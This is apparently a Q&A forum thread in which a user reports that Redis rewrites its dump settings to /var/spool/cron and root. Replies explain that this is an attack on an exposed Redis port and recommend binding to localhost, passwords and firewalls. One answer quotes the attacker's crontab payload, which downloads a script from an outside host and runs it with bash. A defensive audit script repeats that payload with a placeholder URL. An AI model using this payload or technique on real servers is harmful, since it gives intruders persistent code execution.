Redis config dir periodically modified to "/var/spool/cron" with "Failed opening .rdb for saving: Permission denied" error
I have set up my redis-server so that CONFIG GET dir --> "/var/lib/redis" and CONFIG GET dbfilename --> "redis.rdb".

However, after my server has been running a few hours or a few days, I start getting the "Failed opening .rdb for saving: Permission denied" error.

If I again do CONFIG GET dir, it returns "/var/spool/cron", and CONFIG GET dbfilename returns "root". I have tried looking all over the place for some kind of understanding of what is happening, but to no avail.

If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.

Disassemble answered 27/1, 2017 at 5:8

Comments:

Naturalist: Sounds like someone is trying to attack your server. Put a password at the very least.

Disassemble: @ItamarHaber reckon that you could be right.

Naturalist: Sorry, you should consider burning the server and starting from fresh.

This is indeed an attack. If you check your redis keys after this happens you will see a few "string" keys like this: "Backup1", "Backup2", "Backup3".

The value of these will be something like this:

"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"

This is meant to modify your crontab.

Bottom line is - don't have redis port opened to the world.

Rexferd answered 13/6, 2018 at 18:16

Comments:

Panthia: Just fell victim to this attack as well. Turns out I had DMZ on my router set to my machine's IP... Thanks!

Huertas: I get exactly this only a few hours after rolling a new instance, and forgot to set the firewall first! The redis server is inside a docker container. What should I do other than trying to recreate the instance all over again?

Weintraub: Just got hacked also! I changed security groups and spun up the container again after deleting volumes and setting passwords. What else should I do? Could the attacker have gained access to the entire server?
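A small defensive check, added here as an example and not taken from anyone in the thread: it compares the live `dir`/`dbfilename` values against the ones from redis.conf and scans key values for crontab-style lines, which together are the indicators this answer describes. The sample data is constructed to mirror the thread, with a placeholder URL instead of the real one.

```python
import re
from typing import Dict, List

# Expected persistence settings, taken from the question's redis.conf values.
EXPECTED_DIR = "/var/lib/redis"
EXPECTED_DBFILENAME = "redis.rdb"

# A crontab entry: five schedule fields followed by a command. The attacker's
# key values described above hold exactly such a line wrapped in whitespace.
CRON_LINE = re.compile(r"^\s*(?:[\d*/,\-]+\s+){5}\S")


def audit_redis(config: Dict[str, str], keys: Dict[str, str]) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious.

    `config` mirrors the replies to CONFIG GET dir / CONFIG GET dbfilename,
    `keys` maps key name -> string value (e.g. collected with SCAN + GET).
    """
    findings = []
    current_dir = config.get("dir", "")
    current_file = config.get("dbfilename", "")
    if current_dir != EXPECTED_DIR:
        findings.append(f"dir changed to {current_dir!r} (expected {EXPECTED_DIR!r})")
    if current_file != EXPECTED_DBFILENAME:
        findings.append(f"dbfilename changed to {current_file!r} (expected {EXPECTED_DBFILENAME!r})")
    # A dump directory under a cron spool means the RDB file is written where
    # cron will parse it as a crontab, which is the symptom in the question.
    if "cron" in current_dir:
        findings.append(f"dir points into a cron directory: {current_dir!r}")
    for name, value in keys.items():
        for line in value.splitlines():
            if CRON_LINE.match(line):
                findings.append(f"key {name!r} holds a crontab-style line: {line.strip()!r}")
                break
    return findings


# Constructed sample data modelled on the thread; the URL is a placeholder.
COMPROMISED_CONFIG = {"dir": "/var/spool/cron", "dbfilename": "root"}
COMPROMISED_KEYS = {
    "session:42": "user=alice",
    "Backup1": "\t\n*/2 * * * * curl -s https://example.invalid/PLACEHOLDER > .cmd && bash .cmd\n\t",
}
CLEAN_CONFIG = {"dir": "/var/lib/redis", "dbfilename": "redis.rdb"}

if __name__ == "__main__":
    for finding in audit_redis(COMPROMISED_CONFIG, COMPROMISED_KEYS):
        print("ALERT:", finding)
    print("clean instance:", audit_redis(CLEAN_CONFIG, {"session:42": "user=alice"}))
```

Run it from a cron job or monitoring agent against values pulled with redis-cli; any non-empty result is a reason to treat the host as compromised, as the comments above recommend.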

It seems as if this may just be a security issue. Out of the box redis is accessible via any IP address. As a simple first step to check that this was a security issue as suggested by @ItamarHaber, I simply bound the redis server to localhost and now the problem seems to have resolved itself. Here is a great article that helped me with this: A few things about Redis security

Disassemble answered 1/2, 2017 at 10:32

This can be solved by restarting the VM, enabling the UFW firewall, and allowing only those IP addresses which are authorised to access it.

Titos answered 25/9, 2019 at 6:41